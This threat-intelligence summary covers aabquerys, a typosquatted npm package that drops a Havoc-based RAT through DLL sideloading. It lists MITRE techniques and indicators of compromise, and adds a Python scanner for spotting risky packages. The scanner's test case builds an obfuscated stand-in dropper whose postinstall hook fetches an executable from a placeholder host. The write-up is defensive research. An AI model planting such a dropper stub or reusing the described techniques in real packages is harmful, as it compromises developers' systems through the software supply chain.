ReversingLabs identified aabquerys, a malicious npm package that downloads second- and third-stage malware payloads to systems that have downloaded and run the package. The incident highlights growing open source supply chain risks across npm, PyPI, and GitHub, driven by typosquatting and obfuscated code. #aabquerys #NPM #Havoc #Demon.bin #wsc_proxy #typosquatting #openSourceSupplyChain
Key points
- The aabquerys package is a malicious npm module that downloads second- and third-stage payloads to infected systems.
- The campaign employs typosquatting by mimicking legitimate modules (e.g., abquery) to fool developers into installing it.
- The package contains obfuscated JavaScript code, a known red flag in open source modules.
- Sideloading is used: aabquerys delivers a malicious wsc.dll into the process space of wsc_proxy.exe, which is launched and calls the DLL’s run function.
- The third-stage component, Demon.bin, is downloaded from an external C2 site and implements Havoc-based RAT capabilities.
- Maintainer accounts (e.g., obm2y67w, cq0km9hu) published multiple related packages (nvm_jquery, aabquery) with identical malicious behavior.
- Although npm removed the packages and current risk appears limited, the incident underscores open source supply chain risks and the need for vigilance against obfuscated code and external assets.
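As an added example (not code from ReversingLabs or from the packages discussed), a small triage script that flags the two red flags the write-up calls out in an unpacked npm package: install-time lifecycle hooks that reach for external assets, and javascript-obfuscator style identifiers. The sample packages it builds are constructed stand-ins, and the URL in the suspicious one is a placeholder, not an indicator from the report.

```python
import json
import pathlib
import re
import tempfile

# javascript-obfuscator renames identifiers to _0x<hex>; several distinct ones is a strong tell
OBF_IDENT = re.compile(r"\b_0x[0-9a-f]{4,}\b")
# URL literals (including defanged hxxp) and the modules used to fetch or spawn a payload
EXTERNAL = re.compile(r"(?:https?|hxxps?)://[^\s'\"]+|\brequire\(['\"](?:https?|child_process)['\"]\)")
LIFECYCLE = ("preinstall", "install", "postinstall")  # hooks that run during `npm install`


def scan_package(pkg_dir):
    """Return human-readable findings for the unpacked package rooted at pkg_dir."""
    root = pathlib.Path(pkg_dir)
    findings = []
    manifest = json.loads((root / "package.json").read_text())
    for hook, cmd in manifest.get("scripts", {}).items():
        if hook in LIFECYCLE:  # code that executes before anyone reads the package
            findings.append(f"lifecycle hook {hook}: {cmd}")
    for js in sorted(root.rglob("*.js")):
        src = js.read_text(errors="replace")
        rel = js.relative_to(root).as_posix()
        if len(set(OBF_IDENT.findall(src))) >= 5:
            findings.append(f"{rel}: javascript-obfuscator style identifiers")
        for hit in sorted(set(EXTERNAL.findall(src))):
            findings.append(f"{rel}: external asset or spawn primitive {hit}")
    return findings


def build_sample(suspicious):
    """Write a constructed package to a temp dir; the suspicious variant mirrors the red flags above."""
    root = pathlib.Path(tempfile.mkdtemp())
    scripts = {"postinstall": "node index.js"} if suspicious else {"test": "node test.js"}
    manifest = {"name": "sample-pkg", "version": "1.0.0", "scripts": scripts}
    (root / "package.json").write_text(json.dumps(manifest))
    if suspicious:
        # Constructed stand-in for an obfuscated dropper; the URL is a placeholder, not a real IoC.
        body = ("var _0x1a2b=['get','https://cdn.example.invalid/stage2.exe'];"
                "var _0x3c4d=require('https'),_0x5e6f=require('child_process'),_0x7a8b=0,_0x9c0d=1;"
                "_0x3c4d[_0x1a2b[0]](_0x1a2b[1]);")
    else:
        body = "module.exports = function query(sel) { return document.querySelectorAll(sel); };"
    (root / "index.js").write_text(body)
    return root


if __name__ == "__main__":
    for label, flag in (("benign", False), ("suspicious", True)):
        print(label, scan_package(build_sample(flag)) or ["no findings"])
```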
MITRE Techniques
- [T1195] Supply Chain Compromise – Malicious npm package used to deliver second/third stage payloads to systems that downloaded and ran the npm package. ‘aabquerys, a malicious npm package that downloads second and third stage malware payloads to systems that have downloaded and run the npm package.’
- [T1027] Obfuscated Files and Information – Obfuscated code in the open source package; ‘one of which was obfuscated using the Javascript obfuscator’ and ‘the obfuscated code in question was easily de-obfuscated.’
- [T1574.002] DLL Side-Loading – Sideloading performed by placing a DLL named wsc.dll with an exported run function in the same folder as wsc_proxy.exe; the legitimate executable starts and invokes the malicious DLL’s run.
- [T1105] Ingress Tool Transfer – Demon.bin (third-stage) downloaded from an external C2 site (‘…downloads the third stage malicious component, Demon.bin, from an external command and control site…’).
- [T1218] Signed Binary Proxy Execution – wsc_proxy.exe is signed with a certificate issued to AVAST Software s.r.o., so the sideloaded DLL executes inside a trusted, signed host process.
- [T1071.001] Web Protocols – The agent connects to the C2 server using the zh[.]googlecdnb.tk domain (‘connects to the C2 server using the zh[.]googlecdnb.tk domain’).
Indicators of Compromise
- Package names: aabquery, aabquerys, and nvm_jquery (versions 1.0.0–1.0.2)
- SHA1: 62036fd054bac1375fe1205dc595a246e9d94a83, 4789cf9141da47fe265e3d646609d864e0074711, 36cce0d19253d08252d0d3ade1755d6b064786ae, 09a47a484c8e83f0d36772a445b4e6bc12dc247b, 745f47e5349a99ee867fc1f5358462d176f97c6f
- Files: install_flash_player_ppapi.exe (SHA1 0dd0784b875183c5c8701ae4f46ed371a16fd6b3), wsc.dll (SHA1 4ae6fec8052a9648abaaa7b41625c911f355eaa7)
- Files: demon.bin (SHA1 a3dc96b5553606a039a68783989eba4cc0732b3a), core Havoc DLL (SHA1 4b0c13a054cadbfddf82686f4b4ff082e9cae428)
- Domain: zh.googlecdnb.tk
- IP address: 3.136.16.137
- URL: hxxp://3.136.16.137/vendor/htmlawed/htmlawed/demon.bin
Read more: https://www.reversinglabs.com/blog/open-source-malware-sows-havoc-on-supply-chain